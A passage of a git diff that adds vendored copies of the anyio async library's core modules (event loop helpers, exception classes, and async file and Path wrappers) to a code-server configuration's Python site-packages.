isinstance(cm, AbstractAsyncContextManager): + if isasyncgen(cm): + raise TypeError( + "__asynccontextmanager__() returned an async generator instead of " + "an async context manager. Did you forget to add the " + "@asynccontextmanager decorator?" + ) + elif iscoroutine(cm): + cm.close() + raise TypeError( + "__asynccontextmanager__() returned a coroutine object instead of " + "an async context manager. Did you forget to add the " + "@asynccontextmanager decorator and a 'yield' statement?" + ) + + raise TypeError( + f"__asynccontextmanager__() did not return an async context manager, " + f"but {cm.__class__!r}" + ) + + if cm is self: + raise TypeError( + f"{self.__class__.__qualname__}.__asynccontextmanager__() returned " + f"self. Did you forget to add the @asynccontextmanager decorator and a " + f"'yield' statement?" + ) + + value = await cm.__aenter__() + self.__cm = cm + return value + + @final + async def __aexit__( + self: _SupportsAsyncCtxMgr[object, _ExitT_co], + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> _ExitT_co: + assert isinstance(self, AsyncContextManagerMixin) + if self.__cm is None: + raise RuntimeError( + f"this {self.__class__.__qualname__} has not been entered yet" + ) + + # Prevent circular references + cm = self.__cm + del self.__cm + + return cast(_ExitT_co, await cm.__aexit__(exc_type, exc_val, exc_tb)) + + @abstractmethod + def __asynccontextmanager__( + self, + ) -> AbstractAsyncContextManager[object, bool | None]: + """ + Implement your async context manager logic here. + + This method **must** be decorated with + :func:`@asynccontextmanager `. + + .. note:: Remember that the ``yield`` will raise any exception raised in the + enclosed context block, so use a ``finally:`` block to clean up resources! + + :return: an async context manager object + """ diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_eventloop.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_eventloop.py new file mode 100755 index 0000000..59a69cc --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_eventloop.py @@ -0,0 +1,234 @@ +from __future__ import annotations + +import math +import sys +import threading +from collections.abc import Awaitable, Callable, Generator +from contextlib import contextmanager +from contextvars import Token +from importlib import import_module +from typing import TYPE_CHECKING, Any, TypeVar + +from ._exceptions import NoEventLoopError + +if sys.version_info >= (3, 11): + from typing import TypeVarTuple, Unpack +else: + from typing_extensions import TypeVarTuple, Unpack + +sniffio: Any +try: + import sniffio +except ModuleNotFoundError: + sniffio = None + +if TYPE_CHECKING: + from ..abc import AsyncBackend + +# This must be updated when new backends are introduced +BACKENDS = "asyncio", "trio" + +T_Retval = TypeVar("T_Retval") +PosArgsT = TypeVarTuple("PosArgsT") + +threadlocals = threading.local() +loaded_backends: dict[str, type[AsyncBackend]] = {} + + +def run( + func: Callable[[Unpack[PosArgsT]], Awaitable[T_Retval]], + *args: Unpack[PosArgsT], + backend: str = "asyncio", + backend_options: dict[str, Any] | None = None, +) -> T_Retval: + """ + Run the given coroutine function in an asynchronous event loop. + + The current thread must not be already running an event loop. + + :param func: a coroutine function + :param args: positional arguments to ``func`` + :param backend: name of the asynchronous event loop implementation – currently + either ``asyncio`` or ``trio`` + :param backend_options: keyword arguments to call the backend ``run()`` + implementation with (documented :ref:`here `) + :return: the return value of the coroutine function + :raises RuntimeError: if an asynchronous event loop is already running in this + thread + :raises LookupError: if the named backend is not found + + """ + if asynclib_name := current_async_library(): + raise RuntimeError(f"Already running {asynclib_name} in this thread") + + try: + async_backend = get_async_backend(backend) + except ImportError as exc: + raise LookupError(f"No such backend: {backend}") from exc + + token = None + if asynclib_name is None: + # Since we're in control of the event loop, we can cache the name of the async + # library + token = set_current_async_library(backend) + + try: + backend_options = backend_options or {} + return async_backend.run(func, args, {}, backend_options) + finally: + reset_current_async_library(token) + + +async def sleep(delay: float) -> None: + """ + Pause the current task for the specified duration. + + :param delay: the duration, in seconds + + """ + return await get_async_backend().sleep(delay) + + +async def sleep_forever() -> None: + """ + Pause the current task until it's cancelled. + + This is a shortcut for ``sleep(math.inf)``. + + .. versionadded:: 3.1 + + """ + await sleep(math.inf) + + +async def sleep_until(deadline: float) -> None: + """ + Pause the current task until the given time. + + :param deadline: the absolute time to wake up at (according to the internal + monotonic clock of the event loop) + + .. versionadded:: 3.1 + + """ + now = current_time() + await sleep(max(deadline - now, 0)) + + +def current_time() -> float: + """ + Return the current value of the event loop's internal clock. + + :return: the clock value (seconds) + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + + """ + return get_async_backend().current_time() + + +def get_all_backends() -> tuple[str, ...]: + """Return a tuple of the names of all built-in backends.""" + return BACKENDS + + +def get_available_backends() -> tuple[str, ...]: + """ + Test for the availability of built-in backends. + + :return a tuple of the built-in backend names that were successfully imported + + .. versionadded:: 4.12 + + """ + available_backends: list[str] = [] + for backend_name in get_all_backends(): + try: + get_async_backend(backend_name) + except ImportError: + continue + + available_backends.append(backend_name) + + return tuple(available_backends) + + +def get_cancelled_exc_class() -> type[BaseException]: + """ + Return the current async library's cancellation exception class. + + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + + """ + return get_async_backend().cancelled_exception_class() + + +# +# Private API +# + + +@contextmanager +def claim_worker_thread( + backend_class: type[AsyncBackend], token: object +) -> Generator[Any, None, None]: + from ..lowlevel import EventLoopToken + + threadlocals.current_token = EventLoopToken(backend_class, token) + try: + yield + finally: + del threadlocals.current_token + + +def get_async_backend(asynclib_name: str | None = None) -> type[AsyncBackend]: + if asynclib_name is None: + asynclib_name = current_async_library() + if not asynclib_name: + raise NoEventLoopError( + f"Not currently running on any asynchronous event loop. " + f"Available async backends: {', '.join(get_all_backends())}" + ) + + # We use our own dict instead of sys.modules to get the already imported back-end + # class because the appropriate modules in sys.modules could potentially be only + # partially initialized + try: + return loaded_backends[asynclib_name] + except KeyError: + module = import_module(f"anyio._backends._{asynclib_name}") + loaded_backends[asynclib_name] = module.backend_class + return module.backend_class + + +def current_async_library() -> str | None: + if sniffio is None: + # If sniffio is not installed, we assume we're either running asyncio or nothing + import asyncio + + try: + asyncio.get_running_loop() + return "asyncio" + except RuntimeError: + pass + else: + try: + return sniffio.current_async_library() + except sniffio.AsyncLibraryNotFoundError: + pass + + return None + + +def set_current_async_library(asynclib_name: str | None) -> Token | None: + # no-op if sniffio is not installed + if sniffio is None: + return None + + return sniffio.current_async_library_cvar.set(asynclib_name) + + +def reset_current_async_library(token: Token | None) -> None: + if token is not None: + sniffio.current_async_library_cvar.reset(token) diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_exceptions.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_exceptions.py new file mode 100755 index 0000000..3776bed --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_exceptions.py @@ -0,0 +1,156 @@ +from __future__ import annotations + +import sys +from collections.abc import Generator +from textwrap import dedent +from typing import Any + +if sys.version_info < (3, 11): + from exceptiongroup import BaseExceptionGroup + + +class BrokenResourceError(Exception): + """ + Raised when trying to use a resource that has been rendered unusable due to external + causes (e.g. a send stream whose peer has disconnected). + """ + + +class BrokenWorkerProcess(Exception): + """ + Raised by :meth:`~anyio.to_process.run_sync` if the worker process terminates abruptly or + otherwise misbehaves. + """ + + +class BrokenWorkerInterpreter(Exception): + """ + Raised by :meth:`~anyio.to_interpreter.run_sync` if an unexpected exception is + raised in the subinterpreter. + """ + + def __init__(self, excinfo: Any): + # This was adapted from concurrent.futures.interpreter.ExecutionFailed + msg = excinfo.formatted + if not msg: + if excinfo.type and excinfo.msg: + msg = f"{excinfo.type.__name__}: {excinfo.msg}" + else: + msg = excinfo.type.__name__ or excinfo.msg + + super().__init__(msg) + self.excinfo = excinfo + + def __str__(self) -> str: + try: + formatted = self.excinfo.errdisplay + except Exception: + return super().__str__() + else: + return dedent( + f""" + {super().__str__()} + + Uncaught in the interpreter: + + {formatted} + """.strip() + ) + + +class BusyResourceError(Exception): + """ + Raised when two tasks are trying to read from or write to the same resource + concurrently. + """ + + def __init__(self, action: str): + super().__init__(f"Another task is already {action} this resource") + + +class ClosedResourceError(Exception): + """Raised when trying to use a resource that has been closed.""" + + +class ConnectionFailed(OSError): + """ + Raised when a connection attempt fails. + + .. note:: This class inherits from :exc:`OSError` for backwards compatibility. + """ + + +def iterate_exceptions( + exception: BaseException, +) -> Generator[BaseException, None, None]: + if isinstance(exception, BaseExceptionGroup): + for exc in exception.exceptions: + yield from iterate_exceptions(exc) + else: + yield exception + + +class DelimiterNotFound(Exception): + """ + Raised during + :meth:`~anyio.streams.buffered.BufferedByteReceiveStream.receive_until` if the + maximum number of bytes has been read without the delimiter being found. + """ + + def __init__(self, max_bytes: int) -> None: + super().__init__( + f"The delimiter was not found among the first {max_bytes} bytes" + ) + + +class EndOfStream(Exception): + """ + Raised when trying to read from a stream that has been closed from the other end. + """ + + +class IncompleteRead(Exception): + """ + Raised during + :meth:`~anyio.streams.buffered.BufferedByteReceiveStream.receive_exactly` or + :meth:`~anyio.streams.buffered.BufferedByteReceiveStream.receive_until` if the + connection is closed before the requested amount of bytes has been read. + """ + + def __init__(self) -> None: + super().__init__( + "The stream was closed before the read operation could be completed" + ) + + +class TypedAttributeLookupError(LookupError): + """ + Raised by :meth:`~anyio.TypedAttributeProvider.extra` when the given typed attribute + is not found and no default value has been given. + """ + + +class WouldBlock(Exception): + """Raised by ``X_nowait`` functions if ``X()`` would block.""" + + +class NoEventLoopError(RuntimeError): + """ + Raised by several functions that require an event loop to be running in the current + thread when there is no running event loop. + + This is also raised by :func:`.from_thread.run` and :func:`.from_thread.run_sync` + if not calling from an AnyIO worker thread, and no ``token`` was passed. + """ + + +class RunFinishedError(RuntimeError): + """ + Raised by :func:`.from_thread.run` and :func:`.from_thread.run_sync` if the event + loop associated with the explicitly passed token has already finished. + """ + + def __init__(self) -> None: + super().__init__( + "The event loop associated with the given token has already finished" + ) diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_fileio.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_fileio.py new file mode 100755 index 0000000..061f0d7 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_fileio.py @@ -0,0 +1,797 @@ +from __future__ import annotations + +import os +import pathlib +import sys +from collections.abc import ( + AsyncIterator, + Callable, + Iterable, + Iterator, + Sequence, +) +from dataclasses import dataclass +from functools import partial +from os import PathLike +from typing import ( + IO, + TYPE_CHECKING, + Any, + AnyStr, + ClassVar, + Final, + Generic, + overload, +) + +from .. import to_thread +from ..abc import AsyncResource + +if TYPE_CHECKING: + from types import ModuleType + + from _typeshed import OpenBinaryMode, OpenTextMode, ReadableBuffer, WriteableBuffer +else: + ReadableBuffer = OpenBinaryMode = OpenTextMode = WriteableBuffer = object + + +class AsyncFile(AsyncResource, Generic[AnyStr]): + """ + An asynchronous file object. + + This class wraps a standard file object and provides async friendly versions of the + following blocking methods (where available on the original file object): + + * read + * read1 + * readline + * readlines + * readinto + * readinto1 + * write + * writelines + * truncate + * seek + * tell + * flush + + All other methods are directly passed through. + + This class supports the asynchronous context manager protocol which closes the + underlying file at the end of the context block. + + This class also supports asynchronous iteration:: + + async with await open_file(...) as f: + async for line in f: + print(line) + """ + + def __init__(self, fp: IO[AnyStr]) -> None: + self._fp: Any = fp + + def __getattr__(self, name: str) -> object: + return getattr(self._fp, name) + + @property + def wrapped(self) -> IO[AnyStr]: + """The wrapped file object.""" + return self._fp + + async def __aiter__(self) -> AsyncIterator[AnyStr]: + while True: + line = await self.readline() + if line: + yield line + else: + break + + async def aclose(self) -> None: + return await to_thread.run_sync(self._fp.close) + + async def read(self, size: int = -1) -> AnyStr: + return await to_thread.run_sync(self._fp.read, size) + + async def read1(self: AsyncFile[bytes], size: int = -1) -> bytes: + return await to_thread.run_sync(self._fp.read1, size) + + async def readline(self) -> AnyStr: + return await to_thread.run_sync(self._fp.readline) + + async def readlines(self) -> list[AnyStr]: + return await to_thread.run_sync(self._fp.readlines) + + async def readinto(self: AsyncFile[bytes], b: WriteableBuffer) -> int: + return await to_thread.run_sync(self._fp.readinto, b) + + async def readinto1(self: AsyncFile[bytes], b: WriteableBuffer) -> int: + return await to_thread.run_sync(self._fp.readinto1, b) + + @overload + async def write(self: AsyncFile[bytes], b: ReadableBuffer) -> int: ... + + @overload + async def write(self: AsyncFile[str], b: str) -> int: ... + + async def write(self, b: ReadableBuffer | str) -> int: + return await to_thread.run_sync(self._fp.write, b) + + @overload + async def writelines( + self: AsyncFile[bytes], lines: Iterable[ReadableBuffer] + ) -> None: ... + + @overload + async def writelines(self: AsyncFile[str], lines: Iterable[str]) -> None: ... + + async def writelines(self, lines: Iterable[ReadableBuffer] | Iterable[str]) -> None: + return await to_thread.run_sync(self._fp.writelines, lines) + + async def truncate(self, size: int | None = None) -> int: + return await to_thread.run_sync(self._fp.truncate, size) + + async def seek(self, offset: int, whence: int | None = os.SEEK_SET) -> int: + return await to_thread.run_sync(self._fp.seek, offset, whence) + + async def tell(self) -> int: + return await to_thread.run_sync(self._fp.tell) + + async def flush(self) -> None: + return await to_thread.run_sync(self._fp.flush) + + +@overload +async def open_file( + file: str | PathLike[str] | int, + mode: OpenBinaryMode, + buffering: int = ..., + encoding: str | None = ..., + errors: str | None = ..., + newline: str | None = ..., + closefd: bool = ..., + opener: Callable[[str, int], int] | None = ..., +) -> AsyncFile[bytes]: ... + + +@overload +async def open_file( + file: str | PathLike[str] | int, + mode: OpenTextMode = ..., + buffering: int = ..., + encoding: str | None = ..., + errors: str | None = ..., + newline: str | None = ..., + closefd: bool = ..., + opener: Callable[[str, int], int] | None = ..., +) -> AsyncFile[str]: ... + + +async def open_file( + file: str | PathLike[str] | int, + mode: str = "r", + buffering: int = -1, + encoding: str | None = None, + errors: str | None = None, + newline: str | None = None, + closefd: bool = True, + opener: Callable[[str, int], int] | None = None, +) -> AsyncFile[Any]: + """ + Open a file asynchronously. + + The arguments are exactly the same as for the builtin :func:`open`. + + :return: an asynchronous file object + + """ + fp = await to_thread.run_sync( + open, file, mode, buffering, encoding, errors, newline, closefd, opener + ) + return AsyncFile(fp) + + +def wrap_file(file: IO[AnyStr]) -> AsyncFile[AnyStr]: + """ + Wrap an existing file as an asynchronous file. + + :param file: an existing file-like object + :return: an asynchronous file object + + """ + return AsyncFile(file) + + +@dataclass(eq=False) +class _PathIterator(AsyncIterator["Path"]): + iterator: Iterator[PathLike[str]] + + async def __anext__(self) -> Path: + nextval = await to_thread.run_sync( + next, self.iterator, None, abandon_on_cancel=True + ) + if nextval is None: + raise StopAsyncIteration from None + + return Path(nextval) + + +class Path: + """ + An asynchronous version of :class:`pathlib.Path`. + + This class cannot be substituted for :class:`pathlib.Path` or + :class:`pathlib.PurePath`, but it is compatible with the :class:`os.PathLike` + interface. + + It implements the Python 3.10 version of :class:`pathlib.Path` interface, except for + the deprecated :meth:`~pathlib.Path.link_to` method. + + Some methods may be unavailable or have limited functionality, based on the Python + version: + + * :meth:`~pathlib.Path.copy` (available on Python 3.14 or later) + * :meth:`~pathlib.Path.copy_into` (available on Python 3.14 or later) + * :meth:`~pathlib.Path.from_uri` (available on Python 3.13 or later) + * :meth:`~pathlib.PurePath.full_match` (available on Python 3.13 or later) + * :attr:`~pathlib.Path.info` (available on Python 3.14 or later) + * :meth:`~pathlib.Path.is_junction` (available on Python 3.12 or later) + * :meth:`~pathlib.PurePath.match` (the ``case_sensitive`` parameter is only + available on Python 3.13 or later) + * :meth:`~pathlib.Path.move` (available on Python 3.14 or later) + * :meth:`~pathlib.Path.move_into` (available on Python 3.14 or later) + * :meth:`~pathlib.PurePath.relative_to` (the ``walk_up`` parameter is only available + on Python 3.12 or later) + * :meth:`~pathlib.Path.walk` (available on Python 3.12 or later) + + Any methods that do disk I/O need to be awaited on. These methods are: + + * :meth:`~pathlib.Path.absolute` + * :meth:`~pathlib.Path.chmod` + * :meth:`~pathlib.Path.cwd` + * :meth:`~pathlib.Path.exists` + * :meth:`~pathlib.Path.expanduser` + * :meth:`~pathlib.Path.group` + * :meth:`~pathlib.Path.hardlink_to` + * :meth:`~pathlib.Path.home` + * :meth:`~pathlib.Path.is_block_device` + * :meth:`~pathlib.Path.is_char_device` + * :meth:`~pathlib.Path.is_dir` + * :meth:`~pathlib.Path.is_fifo` + * :meth:`~pathlib.Path.is_file` + * :meth:`~pathlib.Path.is_junction` + * :meth:`~pathlib.Path.is_mount` + * :meth:`~pathlib.Path.is_socket` + * :meth:`~pathlib.Path.is_symlink` + * :meth:`~pathlib.Path.lchmod` + * :meth:`~pathlib.Path.lstat` + * :meth:`~pathlib.Path.mkdir` + * :meth:`~pathlib.Path.open` + * :meth:`~pathlib.Path.owner` + * :meth:`~pathlib.Path.read_bytes` + * :meth:`~pathlib.Path.read_text` + * :meth:`~pathlib.Path.readlink` + * :meth:`~pathlib.Path.rename` + * :meth:`~pathlib.Path.replace` + * :meth:`~pathlib.Path.resolve` + * :meth:`~pathlib.Path.rmdir` + * :meth:`~pathlib.Path.samefile` + * :meth:`~pathlib.Path.stat` + * :meth:`~pathlib.Path.symlink_to` + * :meth:`~pathlib.Path.touch` + * :meth:`~pathlib.Path.unlink` + * :meth:`~pathlib.Path.walk` + * :meth:`~pathlib.Path.write_bytes` + * :meth:`~pathlib.Path.write_text` + + Additionally, the following methods return an async iterator yielding + :class:`~.Path` objects: + + * :meth:`~pathlib.Path.glob` + * :meth:`~pathlib.Path.iterdir` + * :meth:`~pathlib.Path.rglob` + """ + + __slots__ = "_path", "__weakref__" + + __weakref__: Any + + def __init__(self, *args: str | PathLike[str]) -> None: + self._path: Final[pathlib.Path] = pathlib.Path(*args) + + def __fspath__(self) -> str: + return self._path.__fspath__() + + def __str__(self) -> str: + return self._path.__str__() + + def __repr__(self) -> str: + return f"{self.__class__.__name__}({self.as_posix()!r})" + + def __bytes__(self) -> bytes: + return self._path.__bytes__() + + def __hash__(self) -> int: + return self._path.__hash__() + + def __eq__(self, other: object) -> bool: + target = other._path if isinstance(other, Path) else other + return self._path.__eq__(target) + + def __lt__(self, other: pathlib.PurePath | Path) -> bool: + target = other._path if isinstance(other, Path) else other + return self._path.__lt__(target) + + def __le__(self, other: pathlib.PurePath | Path) -> bool: + target = other._path if isinstance(other, Path) else other + return self._path.__le__(target) + + def __gt__(self, other: pathlib.PurePath | Path) -> bool: + target = other._path if isinstance(other, Path) else other + return self._path.__gt__(target) + + def __ge__(self, other: pathlib.PurePath | Path) -> bool: + target = other._path if isinstance(other, Path) else other + return self._path.__ge__(target) + + def __truediv__(self, other: str | PathLike[str]) -> Path: + return Path(self._path / other) + + def __rtruediv__(self, other: str | PathLike[str]) -> Path: + return Path(other) / self + + @property + def parts(self) -> tuple[str, ...]: + return self._path.parts + + @property + def drive(self) -> str: + return self._path.drive + + @property + def root(self) -> str: + return self._path.root + + @property + def anchor(self) -> str: + return self._path.anchor + + @property + def parents(self) -> Sequence[Path]: + return tuple(Path(p) for p in self._path.parents) + + @property + def parent(self) -> Path: + return Path(self._path.parent) + + @property + def name(self) -> str: + return self._path.name + + @property + def suffix(self) -> str: + return self._path.suffix + + @property + def suffixes(self) -> list[str]: + return self._path.suffixes + + @property + def stem(self) -> str: + return self._path.stem + + async def absolute(self) -> Path: + path = await to_thread.run_sync(self._path.absolute) + return Path(path) + + def as_posix(self) -> str: + return self._path.as_posix() + + def as_uri(self) -> str: + return self._path.as_uri() + + if sys.version_info >= (3, 13): + parser: ClassVar[ModuleType] = pathlib.Path.parser + + @classmethod + def from_uri(cls, uri: str) -> Path: + return Path(pathlib.Path.from_uri(uri)) + + def full_match( + self, path_pattern: str, *, case_sensitive: bool | None = None + ) -> bool: + return self._path.full_match(path_pattern, case_sensitive=case_sensitive) + + def match( + self, path_pattern: str, *, case_sensitive: bool | None = None + ) -> bool: + return self._path.match(path_pattern, case_sensitive=case_sensitive) + else: + + def match(self, path_pattern: str) -> bool: + return self._path.match(path_pattern) + + if sys.version_info >= (3, 14): + + @property + def info(self) -> Any: # TODO: add return type annotation when Typeshed gets it + return self._path.info + + async def copy( + self, + target: str | os.PathLike[str], + *, + follow_symlinks: bool = True, + preserve_metadata: bool = False, + ) -> Path: + func = partial( + self._path.copy, + follow_symlinks=follow_symlinks, + preserve_metadata=preserve_metadata, + ) + return Path(await to_thread.run_sync(func, pathlib.Path(target))) + + async def copy_into( + self, + target_dir: str | os.PathLike[str], + *, + follow_symlinks: bool = True, + preserve_metadata: bool = False, + ) -> Path: + func = partial( + self._path.copy_into, + follow_symlinks=follow_symlinks, + preserve_metadata=preserve_metadata, + ) + return Path(await to_thread.run_sync(func, pathlib.Path(target_dir))) + + async def move(self, target: str | os.PathLike[str]) -> Path: + # Upstream does not handle anyio.Path properly as a PathLike + target = pathlib.Path(target) + return Path(await to_thread.run_sync(self._path.move, target)) + + async def move_into( + self, + target_dir: str | os.PathLike[str], + ) -> Path: + return Path(await to_thread.run_sync(self._path.move_into, target_dir)) + + def is_relative_to(self, other: str | PathLike[str]) -> bool: + try: + self.relative_to(other) + return True + except ValueError: + return False + + async def chmod(self, mode: int, *, follow_symlinks: bool = True) -> None: + func = partial(os.chmod, follow_symlinks=follow_symlinks) + return await to_thread.run_sync(func, self._path, mode) + + @classmethod + async def cwd(cls) -> Path: + path = await to_thread.run_sync(pathlib.Path.cwd) + return cls(path) + + async def exists(self) -> bool: + return await to_thread.run_sync(self._path.exists, abandon_on_cancel=True) + + async def expanduser(self) -> Path: + return Path( + await to_thread.run_sync(self._path.expanduser, abandon_on_cancel=True) + ) + + if sys.version_info < (3, 12): + # Python 3.11 and earlier + def glob(self, pattern: str) -> AsyncIterator[Path]: + gen = self._path.glob(pattern) + return _PathIterator(gen) + elif (3, 12) <= sys.version_info < (3, 13): + # changed in Python 3.12: + # - The case_sensitive parameter was added. + def glob( + self, + pattern: str, + *, + case_sensitive: bool | None = None, + ) -> AsyncIterator[Path]: + gen = self._path.glob(pattern, case_sensitive=case_sensitive) + return _PathIterator(gen) + elif sys.version_info >= (3, 13): + # Changed in Python 3.13: + # - The recurse_symlinks parameter was added. + # - The pattern parameter accepts a path-like object. + def glob( # type: ignore[misc] # mypy doesn't allow for differing signatures in a conditional block + self, + pattern: str | PathLike[str], + *, + case_sensitive: bool | None = None, + recurse_symlinks: bool = False, + ) -> AsyncIterator[Path]: + gen = self._path.glob( + pattern, # type: ignore[arg-type] + case_sensitive=case_sensitive, + recurse_symlinks=recurse_symlinks, + ) + return _PathIterator(gen) + + async def group(self) -> str: + return await to_thread.run_sync(self._path.group, abandon_on_cancel=True) + + async def hardlink_to( + self, target: str | bytes | PathLike[str] | PathLike[bytes] + ) -> None: + if isinstance(target, Path): + target = target._path + + await to_thread.run_sync(os.link, target, self) + + @classmethod + async def home(cls) -> Path: + home_path = await to_thread.run_sync(pathlib.Path.home) + return cls(home_path) + + def is_absolute(self) -> bool: + return self._path.is_absolute() + + async def is_block_device(self) -> bool: + return await to_thread.run_sync( + self._path.is_block_device, abandon_on_cancel=True + ) + + async def is_char_device(self) -> bool: + return await to_thread.run_sync( + self._path.is_char_device, abandon_on_cancel=True + ) + + async def is_dir(self) -> bool: + return await to_thread.run_sync(self._path.is_dir, abandon_on_cancel=True) + + async def is_fifo(self) -> bool: + return await to_thread.run_sync(self._path.is_fifo, abandon_on_cancel=True) + + async def is_file(self) -> bool: + return await to_thread.run_sync(self._path.is_file, abandon_on_cancel=True) + + if sys.version_info >= (3, 12): + + async def is_junction(self) -> bool: + return await to_thread.run_sync(self._path.is_junction) + + async def is_mount(self) -> bool: + return await to_thread.run_sync( + os.path.ismount, self._path, abandon_on_cancel=True + ) + + def is_reserved(self) -> bool: + return self._path.is_reserved() + + async def is_socket(self) -> bool: + return await to_thread.run_sync(self._path.is_socket, abandon_on_cancel=True) + + async def is_symlink(self) -> bool: + return await to_thread.run_sync(self._path.is_symlink, abandon_on_cancel=True) + + async def iterdir(self) -> AsyncIterator[Path]: + gen = ( + self._path.iterdir() + if sys.version_info < (3, 13) + else await to_thread.run_sync(self._path.iterdir, abandon_on_cancel=True) + ) + async for path in _PathIterator(gen): + yield path + + def joinpath(self, *args: str | PathLike[str]) -> Path: + return Path(self._path.joinpath(*args)) + + async def lchmod(self, mode: int) -> None: + await to_thread.run_sync(self._path.lchmod, mode) + + async def lstat(self) -> os.stat_result: + return await to_thread.run_sync(self._path.lstat, abandon_on_cancel=True) + + async def mkdir( + self, mode: int = 0o777, parents: bool = False, exist_ok: bool = False + ) -> None: + await to_thread.run_sync(self._path.mkdir, mode, parents, exist_ok) + + @overload + async def open( + self, + mode: OpenBinaryMode, + buffering: int = ..., + encoding: str | None = ..., + errors: str | None = ..., + newline: str | None = ..., + ) -> AsyncFile[bytes]: ... + + @overload + async def open( + self, + mode: OpenTextMode = ..., + buffering: int = ..., + encoding: str | None = ..., + errors: str | None = ..., + newline: str | None = ..., + ) -> AsyncFile[str]: ... + + async def open( + self, + mode: str = "r", + buffering: int = -1, + encoding: str | None = None, + errors: str | None = None, + newline: str | None = None, + ) -> AsyncFile[Any]: + fp = await to_thread.run_sync( + self._path.open, mode, buffering, encoding, errors, newline + ) + return AsyncFile(fp) + + async def owner(self) -> str: + return await to_thread.run_sync(self._path.owner, abandon_on_cancel=True) + + async def read_bytes(self) -> bytes: + return await to_thread.run_sync(self._path.read_bytes) + + async def read_text( + self, encoding: str | None = None, errors: str | None = None + ) -> str: + return await to_thread.run_sync(self._path.read_text, encoding, errors) + + if sys.version_info >= (3, 12): + + def relative_to( + self, *other: str | PathLike[str], walk_up: bool = False + ) -> Path: + # relative_to() should work with any PathLike but it doesn't + others = [pathlib.Path(other) for other in other] + return Path(self._path.relative_to(*others, walk_up=walk_up)) + + else: + + def relative_to(self, *other: str | PathLike[str]) -> Path: + return Path(self._path.relative_to(*other)) + + async def readlink(self) -> Path: + target = await to_thread.run_sync(os.readlink, self._path) + return Path(target) + + async def rename(self, target: str | pathlib.PurePath | Path) -> Path: + if isinstance(target, Path): + target = target._path + + await to_thread.run_sync(self._path.rename, target) + return Path(target) + + async def replace(self, target: str | pathlib.PurePath | Path) -> Path: + if isinstance(target, Path): + target = target._path + + await to_thread.run_sync(self._path.replace, target) + return Path(target) + + async def resolve(self, strict: bool = False) -> Path: + func = partial(self._path.resolve, strict=strict) + return Path(await to_thread.run_sync(func, abandon_on_cancel=True)) + + if sys.version_info < (3, 12): + # Pre Python 3.12 + def rglob(self, pattern: str) -> AsyncIterator[Path]: + gen = self._path.rglob(pattern) + return _PathIterator(gen) + elif (3, 12) <= sys.version_info < (3, 13): + # Changed in Python 3.12: + # - The case_sensitive parameter was added. + def rglob( + self, pattern: str, *, case_sensitive: bool | None = None + ) -> AsyncIterator[Path]: + gen = self._path.rglob(pattern, case_sensitive=case_sensitive) + return _PathIterator(gen) + elif sys.version_info >= (3, 13): + # Changed in Python 3.13: + # - The recurse_symlinks parameter was added. + # - The pattern parameter accepts a path-like object. + def rglob( # type: ignore[misc] # mypy doesn't allow for differing signatures in a conditional block + self, + pattern: str | PathLike[str], + *, + case_sensitive: bool | None = None, + recurse_symlinks: bool = False, + ) -> AsyncIterator[Path]: + gen = self._path.rglob( + pattern, # type: ignore[arg-type] + case_sensitive=case_sensitive, + recurse_symlinks=recurse_symlinks, + ) + return _PathIterator(gen) + + async def rmdir(self) -> None: + await to_thread.run_sync(self._path.rmdir) + + async def samefile(self, other_path: str | PathLike[str]) -> bool: + if isinstance(other_path, Path): + other_path = other_path._path + + return await to_thread.run_sync( + self._path.samefile, other_path, abandon_on_cancel=True + ) + + async def stat(self, *, follow_symlinks: bool = True) -> os.stat_result: + func = partial(os.stat, follow_symlinks=follow_symlinks) + return await to_thread.run_sync(func, self._path, abandon_on_cancel=True) + + async def symlink_to( + self, + target: str | bytes | PathLike[str] | PathLike[bytes], + target_is_directory: bool = False, + ) -> None: + if isinstance(target, Path): + target = target._path + + await to_thread.run_sync(self._path.symlink_to, target, target_is_directory) + + async def touch(self, mode: int = 0o666, exist_ok: bool = True) -> None: + await to_thread.run_sync(self._path.touch, mode, exist_ok) + + async def unlink(self, missing_ok: bool = False) -> None: + try: + await to_thread.run_sync(self._path.unlink) + except FileNotFoundError: + if not missing_ok: + raise + + if sys.version_info >= (3, 12): + + async def walk( + self, + top_down: bool = True, + on_error: Callable[[OSError], object] | None = None, + follow_symlinks: bool = False, + ) -> AsyncIterator[tuple[Path, list[str], list[str]]]: + def get_next_value() -> tuple[pathlib.Path, list[str], list[str]] | None: + try: + return next(gen) + except StopIteration: + return None + + gen = self._path.walk(top_down, on_error, follow_symlinks) + while True: + value = await to_thread.run_sync(get_next_value) + if value is None: + return + + root, dirs, paths = value + yield Path(root), dirs, paths + + def with_name(self, name: str) -> Path: + return Path(self._path.with_name(name)) + + def with_stem(self, stem: str) -> Path: + return Path(self._path.with_name(stem + self._path.suffix)) + + def with_suffix(self, suffix: str) -> Path: + return Path(self._path.with_suffix(suffix)) + + def with_segments(self, *pathsegments: str | PathLike[str]) -> Path: + return Path(*pathsegments) + + async def write_bytes(self, data: bytes) -> int: + return await to_thread.run_sync(self._path.write_bytes, data) + + async def write_text( + self, + data: str, + encoding: str | None = None, + errors: str | None = None, + newline: str | None = None, + ) -> int: + # Path.write_text() does not support the "newline" parameter before Python 3.10 + def sync_write_text() -> int: + with self._path.open( + "w", encoding=encoding, errors=errors, newline=newline + ) as fp: + return fp.write(data) + + return await to_thread.run_sync(sync_write_text) + + +PathLike.register(Path) diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_resources.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_resources.py new file mode 100755 index 0000000..b9a5344 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_resources.py @@ -0,0 +1,18 @@ +from __future__ import annotations + +from ..abc import AsyncResource +from ._tasks import CancelScope + + +async def aclose_forcefully(resource: AsyncResource) -> None: + """ + Close an asynchronous resource in a 